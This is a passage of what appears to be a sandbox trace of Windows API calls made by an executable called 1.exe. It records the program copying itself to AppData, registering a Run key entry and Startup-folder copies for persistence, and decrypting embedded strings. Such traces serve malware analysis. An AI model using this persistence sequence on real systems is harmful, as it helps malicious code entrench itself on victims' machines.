phkResult=0xcff554 | out: phkResult=0xcff554*=0x200) returned 0x0 [0034.838] RegQueryValueExW (in: hKey=0x200, lpValueName="Startup", lpReserved=0x0, lpType=0xcff550, lpData=0x2af43e0, lpcbData=0xcff558*=0xf2 | out: lpType=0xcff550*=0x2, lpData="%USERPROFILE%\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup", lpcbData=0xcff558*=0x98) returned 0x0 [0034.838] RegCloseKey (hKey=0x200) returned 0x0 [0034.838] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2af1258 | out: hHeap=0x2af0000) returned 1 [0034.838] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x8, Size=0x1e) returned 0x2af1258 [0034.838] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders", ulOptions=0x0, samDesired=0x20119, phkResult=0xcff554 | out: phkResult=0xcff554*=0x200) returned 0x0 [0034.838] RegQueryValueExW (in: hKey=0x200, lpValueName="Common Startup", lpReserved=0x0, lpType=0xcff550, lpData=0x2af4478, lpcbData=0xcff558*=0x5a | out: lpType=0xcff550*=0x0, lpData=0x2af4478*=0x0, lpcbData=0xcff558*=0x5a) returned 0x2 [0034.838] RegCloseKey (hKey=0x200) returned 0x0 [0034.838] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders", ulOptions=0x0, samDesired=0x20119, phkResult=0xcff568 | out: phkResult=0xcff568*=0x200) returned 0x0 [0034.838] RegQueryValueExW (in: hKey=0x200, lpValueName="Common Startup", lpReserved=0x0, lpType=0xcff564, lpData=0x2af4478, lpcbData=0xcff56c*=0x5a | out: lpType=0xcff564*=0x2, lpData=0x2af4478*=0x0, lpcbData=0xcff56c*=0x78) returned 0xea [0034.838] RegCloseKey (hKey=0x200) returned 0x0 [0034.838] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2af1258 | out: hHeap=0x2af0000) returned 1 [0034.838] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2af1448 | out: hHeap=0x2af0000) returned 1 [0034.839] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2af43e0 | out: hHeap=0x2af0000) returned 1 [0034.839] RtlReAllocateHeap (Heap=0x2af0000, Flags=0x0, Ptr=0x2af1348, Size=0x1e2) returned 0x2af1348 [0034.839] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1e2) returned 0x2af43e0 [0034.839] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x90) returned 0x2af45d0 [0034.839] CryptImportKey (in: hProv=0xe843e0, pbData=0xcff570, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0xcff5d8 | out: phKey=0xcff5d8*=0xe92270) returned 1 [0034.839] CryptSetKeyParam (hKey=0xe92270, dwParam=0x1, pbData=0xcff5c0, dwFlags=0x0) returned 1 [0034.839] CryptDecrypt (in: hKey=0xe92270, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2af45d0, pdwDataLen=0xcff58c | out: pbData=0x2af45d0, pdwDataLen=0xcff58c) returned 1 [0034.839] CryptDestroyKey (hKey=0xe92270) returned 1 [0034.839] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x8, Size=0x10) returned 0x2af1258 [0034.839] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders", ulOptions=0x0, samDesired=0x20119, phkResult=0xcff554 | out: phkResult=0xcff554*=0x200) returned 0x0 [0034.839] RegQueryValueExW (in: hKey=0x200, lpValueName="Startup", lpReserved=0x0, lpType=0xcff550, lpData=0x2af43e0, lpcbData=0xcff558*=0x1e2 | out: lpType=0xcff550*=0x2, lpData="%USERPROFILE%\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup", lpcbData=0xcff558*=0x98) returned 0x0 [0034.839] RegCloseKey (hKey=0x200) returned 0x0 [0034.839] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2af1258 | out: hHeap=0x2af0000) returned 1 [0034.839] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x8, Size=0x1e) returned 0x2af1258 [0034.839] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders", ulOptions=0x0, samDesired=0x20119, phkResult=0xcff554 | out: phkResult=0xcff554*=0x200) returned 0x0 [0034.839] RegQueryValueExW (in: hKey=0x200, lpValueName="Common Startup", lpReserved=0x0, lpType=0xcff550, lpData=0x2af4478, lpcbData=0xcff558*=0x14a | out: lpType=0xcff550*=0x0, lpData=0x2af4478*=0x0, lpcbData=0xcff558*=0x14a) returned 0x2 [0034.839] RegCloseKey (hKey=0x200) returned 0x0 [0034.839] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders", ulOptions=0x0, samDesired=0x20119, phkResult=0xcff568 | out: phkResult=0xcff568*=0x200) returned 0x0 [0034.839] RegQueryValueExW (in: hKey=0x200, lpValueName="Common Startup", lpReserved=0x0, lpType=0xcff564, lpData=0x2af4478, lpcbData=0xcff56c*=0x14a | out: lpType=0xcff564*=0x2, lpData="%ProgramData%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup", lpcbData=0xcff56c*=0x78) returned 0x0 [0034.839] RegCloseKey (hKey=0x200) returned 0x0 [0034.839] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2af1258 | out: hHeap=0x2af0000) returned 1 [0034.839] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2af45d0 | out: hHeap=0x2af0000) returned 1 [0034.839] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup;%ProgramData%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup", lpDst=0x2af1348, nSize=0xf1 | out: lpDst="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup;C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup") returned 0x8b [0034.839] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2af43e0 | out: hHeap=0x2af0000) returned 1 [0034.839] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2af1300 | out: hHeap=0x2af0000) returned 1 [0034.839] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20a) returned 0x2af43e0 [0034.839] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20a) returned 0x2af45f8 [0034.839] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20a) returned 0x2af4810 [0034.839] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20a) returned 0x2af4a28 [0034.839] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x2af43e0, nSize=0x104 | out: lpFilename="C:\\Users\\FD1HVy\\Desktop\\1.exe" (normalized: "c:\\users\\fd1hvy\\desktop\\1.exe")) returned 0x1d [0034.839] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20a) returned 0x2af4c40 [0034.839] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x2af4c40, nSize=0x104 | out: lpFilename="C:\\Users\\FD1HVy\\Desktop\\1.exe" (normalized: "c:\\users\\fd1hvy\\desktop\\1.exe")) returned 0x1d [0034.839] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2af4c40 | out: hHeap=0x2af0000) returned 1 [0034.839] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20a) returned 0x2af4c40 [0034.840] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x2af4c40, nSize=0x104 | out: lpFilename="C:\\Users\\FD1HVy\\Desktop\\1.exe" (normalized: "c:\\users\\fd1hvy\\desktop\\1.exe")) returned 0x1d [0034.840] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2af4c40 | out: hHeap=0x2af0000) returned 1 [0034.840] CopyFileW (lpExistingFileName="C:\\Users\\FD1HVy\\Desktop\\1.exe" (normalized: "c:\\users\\fd1hvy\\desktop\\1.exe"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\1.exe" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\1.exe"), bFailIfExists=0) returned 1 [0035.018] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Run", ulOptions=0x0, samDesired=0x20106, phkResult=0xcff66c | out: phkResult=0xcff66c*=0x0) returned 0x5 [0035.018] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Run", ulOptions=0x0, samDesired=0x20106, phkResult=0xcff658 | out: phkResult=0xcff658*=0x200) returned 0x0 [0035.018] RegSetValueExW (in: hKey=0x200, lpValueName="1", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\FD1HVy\\AppData\\Local\\1.exe", cbData=0x46 | out: lpData="C:\\Users\\FD1HVy\\AppData\\Local\\1.exe") returned 0x0 [0035.025] RegCloseKey (hKey=0x200) returned 0x0 [0035.025] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x118) returned 0x2af4c40 [0035.025] GetLastError () returned 0x0 [0035.025] SetLastError (dwErrCode=0x0) [0035.025] GetLastError () returned 0x0 [0035.025] SetLastError (dwErrCode=0x0) [0035.025] GetLastError () returned 0x0 [0035.025] SetLastError (dwErrCode=0x0) [0035.025] GetLastError () returned 0x0 [0035.026] SetLastError (dwErrCode=0x0) [0035.026] GetLastError () returned 0x0 [0035.026] SetLastError (dwErrCode=0x0) [0035.026] GetLastError () returned 0x0 [0035.026] SetLastError (dwErrCode=0x0) [0035.026] GetLastError () returned 0x0 [0035.026] SetLastError (dwErrCode=0x0) [0035.026] GetLastError () returned 0x0 [0035.026] SetLastError (dwErrCode=0x0) [0035.026] GetLastError () returned 0x0 [0035.026] SetLastError (dwErrCode=0x0) [0035.026] GetLastError () returned 0x0 [0035.026] SetLastError (dwErrCode=0x0) [0035.026] GetLastError () returned 0x0 [0035.026] SetLastError (dwErrCode=0x0) [0035.026] GetLastError () returned 0x0 [0035.026] SetLastError (dwErrCode=0x0) [0035.026] GetLastError () returned 0x0 [0035.026] SetLastError (dwErrCode=0x0) [0035.026] GetLastError () returned 0x0 [0035.026] SetLastError (dwErrCode=0x0) [0035.026] GetLastError () returned 0x0 [0035.026] SetLastError (dwErrCode=0x0) [0035.026] GetLastError () returned 0x0 [0035.026] SetLastError (dwErrCode=0x0) [0035.026] GetLastError () returned 0x0 [0035.026] SetLastError (dwErrCode=0x0) [0035.027] GetLastError () returned 0x0 [0035.027] SetLastError (dwErrCode=0x0) [0035.027] GetLastError () returned 0x0 [0035.027] SetLastError (dwErrCode=0x0) [0035.027] GetLastError () returned 0x0 [0035.027] SetLastError (dwErrCode=0x0) [0035.027] GetLastError () returned 0x0 [0035.027] SetLastError (dwErrCode=0x0) [0035.027] GetLastError () returned 0x0 [0035.027] SetLastError (dwErrCode=0x0) [0035.027] GetLastError () returned 0x0 [0035.027] SetLastError (dwErrCode=0x0) [0035.027] GetLastError () returned 0x0 [0035.027] SetLastError (dwErrCode=0x0) [0035.027] GetLastError () returned 0x0 [0035.027] SetLastError (dwErrCode=0x0) [0035.027] GetLastError () returned 0x0 [0035.027] SetLastError (dwErrCode=0x0) [0035.027] GetLastError () returned 0x0 [0035.027] SetLastError (dwErrCode=0x0) [0035.027] GetLastError () returned 0x0 [0035.027] SetLastError (dwErrCode=0x0) [0035.027] GetLastError () returned 0x0 [0035.027] SetLastError (dwErrCode=0x0) [0035.027] GetLastError () returned 0x0 [0035.027] SetLastError (dwErrCode=0x0) [0035.027] GetLastError () returned 0x0 [0035.028] SetLastError (dwErrCode=0x0) [0035.028] GetLastError () returned 0x0 [0035.028] SetLastError (dwErrCode=0x0) [0035.028] GetLastError () returned 0x0 [0035.032] SetLastError (dwErrCode=0x0) [0035.032] GetLastError () returned 0x0 [0035.036] SetLastError (dwErrCode=0x0) [0035.036] GetLastError () returned 0x0 [0035.037] SetLastError (dwErrCode=0x0) [0035.037] GetLastError () returned 0x0 [0035.037] SetLastError (dwErrCode=0x0) [0035.037] GetLastError () returned 0x0 [0035.037] SetLastError (dwErrCode=0x0) [0035.037] GetLastError () returned 0x0 [0035.037] SetLastError (dwErrCode=0x0) [0035.037] GetLastError () returned 0x0 [0035.037] SetLastError (dwErrCode=0x0) [0035.037] GetLastError () returned 0x0 [0035.037] SetLastError (dwErrCode=0x0) [0035.037] GetLastError () returned 0x0 [0035.037] SetLastError (dwErrCode=0x0) [0035.037] GetLastError () returned 0x0 [0035.038] SetLastError (dwErrCode=0x0) [0035.038] GetLastError () returned 0x0 [0035.038] SetLastError (dwErrCode=0x0) [0035.038] GetLastError () returned 0x0 [0035.038] SetLastError (dwErrCode=0x0) [0035.038] GetLastError () returned 0x0 [0035.038] SetLastError (dwErrCode=0x0) [0035.038] GetLastError () returned 0x0 [0035.038] SetLastError (dwErrCode=0x0) [0035.038] GetLastError () returned 0x0 [0035.038] SetLastError (dwErrCode=0x0) [0035.038] GetLastError () returned 0x0 [0035.038] SetLastError (dwErrCode=0x0) [0035.038] GetLastError () returned 0x0 [0035.038] SetLastError (dwErrCode=0x0) [0035.038] GetLastError () returned 0x0 [0035.038] SetLastError (dwErrCode=0x0) [0035.038] GetLastError () returned 0x0 [0035.038] SetLastError (dwErrCode=0x0) [0035.038] GetLastError () returned 0x0 [0035.038] SetLastError (dwErrCode=0x0) [0035.038] GetLastError () returned 0x0 [0035.038] SetLastError (dwErrCode=0x0) [0035.038] GetLastError () returned 0x0 [0035.038] SetLastError (dwErrCode=0x0) [0035.038] GetLastError () returned 0x0 [0035.038] SetLastError (dwErrCode=0x0) [0035.039] GetLastError () returned 0x0 [0035.039] SetLastError (dwErrCode=0x0) [0035.039] GetLastError () returned 0x0 [0035.039] SetLastError (dwErrCode=0x0) [0035.039] GetLastError () returned 0x0 [0035.039] SetLastError (dwErrCode=0x0) [0035.039] GetLastError () returned 0x0 [0035.039] SetLastError (dwErrCode=0x0) [0035.039] GetLastError () returned 0x0 [0035.039] SetLastError (dwErrCode=0x0) [0035.039] GetLastError () returned 0x0 [0035.039] SetLastError (dwErrCode=0x0) [0035.039] GetLastError () returned 0x0 [0035.039] SetLastError (dwErrCode=0x0) [0035.039] GetLastError () returned 0x0 [0035.039] SetLastError (dwErrCode=0x0) [0035.039] GetLastError () returned 0x0 [0035.039] SetLastError (dwErrCode=0x0) [0035.039] GetLastError () returned 0x0 [0035.039] SetLastError (dwErrCode=0x0) [0035.039] GetLastError () returned 0x0 [0035.039] SetLastError (dwErrCode=0x0) [0035.039] GetLastError () returned 0x0 [0035.039] SetLastError (dwErrCode=0x0) [0035.039] GetLastError () returned 0x0 [0035.039] SetLastError (dwErrCode=0x0) [0035.039] GetLastError () returned 0x0 [0035.040] SetLastError (dwErrCode=0x0) [0035.040] GetLastError () returned 0x0 [0035.040] SetLastError (dwErrCode=0x0) [0035.040] GetLastError () returned 0x0 [0035.040] SetLastError (dwErrCode=0x0) [0035.040] GetLastError () returned 0x0 [0035.040] SetLastError (dwErrCode=0x0) [0035.040] GetLastError () returned 0x0 [0035.040] SetLastError (dwErrCode=0x0) [0035.040] GetLastError () returned 0x0 [0035.040] SetLastError (dwErrCode=0x0) [0035.040] GetLastError () returned 0x0 [0035.040] SetLastError (dwErrCode=0x0) [0035.040] GetLastError () returned 0x0 [0035.040] SetLastError (dwErrCode=0x0) [0035.040] GetLastError () returned 0x0 [0035.040] SetLastError (dwErrCode=0x0) [0035.040] GetLastError () returned 0x0 [0035.040] SetLastError (dwErrCode=0x0) [0035.040] GetLastError () returned 0x0 [0035.040] SetLastError (dwErrCode=0x0) [0035.040] GetLastError () returned 0x0 [0035.040] SetLastError (dwErrCode=0x0) [0035.040] GetLastError () returned 0x0 [0035.040] SetLastError (dwErrCode=0x0) [0035.040] GetLastError () returned 0x0 [0035.041] SetLastError (dwErrCode=0x0) [0035.041] GetLastError () returned 0x0 [0035.041] SetLastError (dwErrCode=0x0) [0035.041] GetLastError () returned 0x0 [0035.041] SetLastError (dwErrCode=0x0) [0035.041] GetLastError () returned 0x0 [0035.041] SetLastError (dwErrCode=0x0) [0035.041] GetLastError () returned 0x0 [0035.041] SetLastError (dwErrCode=0x0) [0035.041] GetLastError () returned 0x0 [0035.041] SetLastError (dwErrCode=0x0) [0035.041] GetLastError () returned 0x0 [0035.041] SetLastError (dwErrCode=0x0) [0035.041] GetLastError () returned 0x0 [0035.041] SetLastError (dwErrCode=0x0) [0035.041] GetLastError () returned 0x0 [0035.041] SetLastError (dwErrCode=0x0) [0035.041] GetLastError () returned 0x0 [0035.041] SetLastError (dwErrCode=0x0) [0035.041] GetLastError () returned 0x0 [0035.041] SetLastError (dwErrCode=0x0) [0035.041] GetLastError () returned 0x0 [0035.041] SetLastError (dwErrCode=0x0) [0035.041] GetLastError () returned 0x0 [0035.041] SetLastError (dwErrCode=0x0) [0035.041] GetLastError () returned 0x0 [0035.042] SetLastError (dwErrCode=0x0) [0035.042] GetLastError () returned 0x0 [0035.042] SetLastError (dwErrCode=0x0) [0035.042] GetLastError () returned 0x0 [0035.042] SetLastError (dwErrCode=0x0) [0035.042] GetLastError () returned 0x0 [0035.042] SetLastError (dwErrCode=0x0) [0035.042] GetLastError () returned 0x0 [0035.042] SetLastError (dwErrCode=0x0) [0035.042] GetLastError () returned 0x0 [0035.042] SetLastError (dwErrCode=0x0) [0035.042] GetLastError () returned 0x0 [0035.042] SetLastError (dwErrCode=0x0) [0035.042] GetLastError () returned 0x0 [0035.042] SetLastError (dwErrCode=0x0) [0035.042] GetLastError () returned 0x0 [0035.042] SetLastError (dwErrCode=0x0) [0035.042] GetLastError () returned 0x0 [0035.042] SetLastError (dwErrCode=0x0) [0035.042] GetLastError () returned 0x0 [0035.042] SetLastError (dwErrCode=0x0) [0035.042] GetLastError () returned 0x0 [0035.042] SetLastError (dwErrCode=0x0) [0035.042] GetLastError () returned 0x0 [0035.042] SetLastError (dwErrCode=0x0) [0035.042] GetLastError () returned 0x0 [0035.043] SetLastError (dwErrCode=0x0) [0035.043] GetLastError () returned 0x0 [0035.043] SetLastError (dwErrCode=0x0) [0035.043] GetLastError () returned 0x0 [0035.043] SetLastError (dwErrCode=0x0) [0035.043] GetLastError () returned 0x0 [0035.043] SetLastError (dwErrCode=0x0) [0035.043] GetLastError () returned 0x0 [0035.043] SetLastError (dwErrCode=0x0) [0035.043] GetLastError () returned 0x0 [0035.043] SetLastError (dwErrCode=0x0) [0035.043] GetLastError () returned 0x0 [0035.043] SetLastError (dwErrCode=0x0) [0035.043] GetLastError () returned 0x0 [0035.043] SetLastError (dwErrCode=0x0) [0035.043] GetLastError () returned 0x0 [0035.043] SetLastError (dwErrCode=0x0) [0035.043] GetLastError () returned 0x0 [0035.043] SetLastError (dwErrCode=0x0) [0035.043] GetLastError () returned 0x0 [0035.043] SetLastError (dwErrCode=0x0) [0035.043] GetLastError () returned 0x0 [0035.043] SetLastError (dwErrCode=0x0) [0035.043] GetLastError () returned 0x0 [0035.043] SetLastError (dwErrCode=0x0) [0035.044] GetLastError () returned 0x0 [0035.044] SetLastError (dwErrCode=0x0) [0035.044] GetLastError () returned 0x0 [0035.044] SetLastError (dwErrCode=0x0) [0035.044] GetLastError () returned 0x0 [0035.044] SetLastError (dwErrCode=0x0) [0035.044] GetLastError () returned 0x0 [0035.044] SetLastError (dwErrCode=0x0) [0035.044] GetLastError () returned 0x0 [0035.044] SetLastError (dwErrCode=0x0) [0035.044] GetLastError () returned 0x0 [0035.044] SetLastError (dwErrCode=0x0) [0035.044] GetLastError () returned 0x0 [0035.044] SetLastError (dwErrCode=0x0) [0035.044] GetLastError () returned 0x0 [0035.044] SetLastError (dwErrCode=0x0) [0035.044] GetLastError () returned 0x0 [0035.044] SetLastError (dwErrCode=0x0) [0035.044] GetLastError () returned 0x0 [0035.044] SetLastError (dwErrCode=0x0) [0035.044] GetLastError () returned 0x0 [0035.044] SetLastError (dwErrCode=0x0) [0035.044] GetLastError () returned 0x0 [0035.044] SetLastError (dwErrCode=0x0) [0035.044] GetLastError () returned 0x0 [0035.044] SetLastError (dwErrCode=0x0) [0035.045] GetLastError () returned 0x0 [0035.045] SetLastError (dwErrCode=0x0) [0035.045] GetLastError () returned 0x0 [0035.045] SetLastError (dwErrCode=0x0) [0035.045] GetLastError () returned 0x0 [0035.045] SetLastError (dwErrCode=0x0) [0035.045] GetLastError () returned 0x0 [0035.045] SetLastError (dwErrCode=0x0) [0035.045] CopyFileW (lpExistingFileName="C:\\Users\\FD1HVy\\Desktop\\1.exe" (normalized: "c:\\users\\fd1hvy\\desktop\\1.exe"), lpNewFileName="c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\startup\\1.exe" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\startup\\1.exe"), bFailIfExists=1) returned 1 [0035.081] CopyFileW (lpExistingFileName="C:\\Users\\FD1HVy\\Desktop\\1.exe" (normalized: "c:\\users\\fd1hvy\\desktop\\1.exe"), lpNewFileName="c:\\programdata\\microsoft\\windows\\start menu\\programs\\startup\\1.exe" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\startup\\1.exe"), bFailIfExists=1) returned 0 [0035.082] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2af4c40 | out: hHeap=0x2af0000) returned 1 [0035.082] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2af43e0 | out: hHeap=0x2af0000) returned 1 [0035.082] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2af45f8 | out: hHeap=0x2af0000) returned 1 [0035.082] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2af4810 | out: hHeap=0x2af0000) returned 1 [0035.082] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2af4a28 | out: hHeap=0x2af0000) returned 1 [0035.082] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2af11f0 | out: hHeap=0x2af0000) returned 1 [0035.082] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2af1280 | out: hHeap=0x2af0000) returned 1 [0035.082] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2af1348 | out: hHeap=0x2af0000) returned 1 [0035.082] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2af11f0 [0035.082] CryptImportKey (in: hProv=0xe843e0, pbData=0xcff5d0, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0xcff638 | out: phKey=0xcff638*=0xe929b0) returned 1 [0035.082] CryptSetKeyParam (hKey=0xe929b0, dwParam=0x1, pbData=0xcff620, dwFlags=0x0) returned 1 [0035.082] CryptDecrypt (in: hKey=0xe929b0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2af11f0, pdwDataLen=0xcff5ec | out: pbData=0x2af11f0, pdwDataLen=0xcff5ec) returned 1 [0035.082] CryptDestroyKey (hKey=0xe929b0) returned 1 [0035.082] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x8, Size=0x1e) returned 0x2af1218 [0035.082] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1e) returned 0x2af1240 [0035.082] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x90) returned 0x2af1268 [0035.082] CryptImportKey (in: hProv=0xe843e0, pbData=0xcff5a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0xcff610 | out: phKey=0xcff610*=0xe926b0) returned 1 [0035.083] CryptSetKeyParam (hKey=0xe926b0, dwParam=0x1, pbData=0xcff5f8, dwFlags=0x0) returned 1 [0035.083] CryptDecrypt (in: hKey=0xe926b0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2af1268, pdwDataLen=0xcff5c4 | out: pbData=0x2af1268, pdwDataLen=0xcff5c4) returned 1 [0035.083] CryptDestroyKey (hKey=0xe926b0) returned 1 [0035.083] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2af1268 | out: hHeap=0x2af0000) returned 1 [0035.083] ExpandEnvironmentStringsW (in: lpSrc="%systemdrive%\\", lpDst=0x2af1218, nSize=0xf | out: lpDst="C:\\") returned 0x4 [0035.083] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2af1240 | out: hHeap=0x2af0000) returned 1 [0035.083] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2af11f0 | out: hHeap=0x2af0000) returned 1 [0035.083] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x3, lpVolumeSerialNumber=0xcff678, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0xcff678*=0xb4197730, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0035.083] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2af1218 | out: hHeap=0x2af0000) returned 1 [0035.083] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x28) returned 0x2af11f0 [0035.083] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2af1220 [0035.083] CryptImportKey (in: hProv=0xe843e0, pbData=0xcff5b4, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0xcff61c | out: phKey=0xcff61c*=0xe929b0) returned 1 [0035.083] CryptSetKeyParam (hKey=0xe929b0, dwParam=0x1, pbData=0xcff604, dwFlags=0x0) returned 1 [0035.083] CryptDecrypt (in: hKey=0xe929b0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2af1220, pdwDataLen=0xcff5d0 | out: pbData=0x2af1220, pdwDataLen=0xcff5d0) returned 1 [0035.083] CryptDestroyKey (hKey=0xe929b0) returned 1 [0035.083] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x60) returned 0x2af1238 [0035.083] CryptImportKey (in: hProv=0xe843e0, pbData=0xcff5ac, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0xcff614 | out: phKey=0xcff614*=0xe928b0) returned 1 [0035.083] CryptSetKeyParam (hKey=0xe928b0, dwParam=0x1, pbData=0xcff5fc, dwFlags=0x0) returned 1 [0035.083] CryptDecrypt (in: hKey=0xe928b0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2af1238, pdwDataLen=0xcff5c8 | out: pbData=0x2af1238, pdwDataLen=0xcff5c8) returned 1 [0035.083] CryptDestroyKey (hKey=0xe928b0) returned 1 [0035.083] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x8, Size=0x56) returned 0x2af12a0 [0035.083] RtlReAllocateHeap (Heap=0x2af0000, Flags=0x0, Ptr=0x2af12a0, Size=0xaa) returned 0x2af12a0 [0035.083] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2af1358 [0035.083] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x180) returned 0x2af1370 [0035.083] CryptImportKey (in: hProv=0xe843e0, pbData=0xcff57c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0xcff5e4 | out: phKey=0xcff5e4*=0xe929b0) returned 1 [0035.083] CryptSetKeyParam (hKey=0xe929b0, dwParam=0x1, pbData=0xcff5cc, dwFlags=0x0) returned 1 [0035.083] CryptDecrypt (in: hKey=0xe929b0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2af1370, pdwDataLen=0xcff598 | out: pbData=0x2af1370, pdwDataLen=0xcff598) returned 1 [0035.083] CryptDestroyKey (hKey=0xe929b0) returned 1 [0035.083] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x220) returned 0x2af43e0 [0035.083] CryptImportKey (in: hProv=0xe843e0, pbData=0xcff574, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0xcff5dc | out: phKey=0xcff5dc*=0xe923b0) returned 1 [0035.083] CryptSetKeyParam (hKey=0xe923b0, dwParam=0x1, pbData=0xcff5c4, dwFlags=0x0) returned 1 [0035.083] CryptDecrypt (in: hKey=0xe923b0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2af43e0, pdwDataLen=0xcff590 | out: pbData=0x2af43e0, pdwDataLen=0xcff590) returned 1 [0035.083] CryptDestroyKey (hKey=0xe923b0) returned 1 [0035.083] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x90) returned 0x2af4608 [0035.084] CryptImportKey (in: hProv=0xe843e0, pbData=0xcff54c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0xcff5b4 | out: phKey=0xcff5b4*=0xe926b0) returned 1 [0035.084] CryptSetKeyParam (hKey=0xe926b0, dwParam=0x1, pbData=0xcff59c, dwFlags=0x0) returned 1 [0035.084] CryptDecrypt (in: 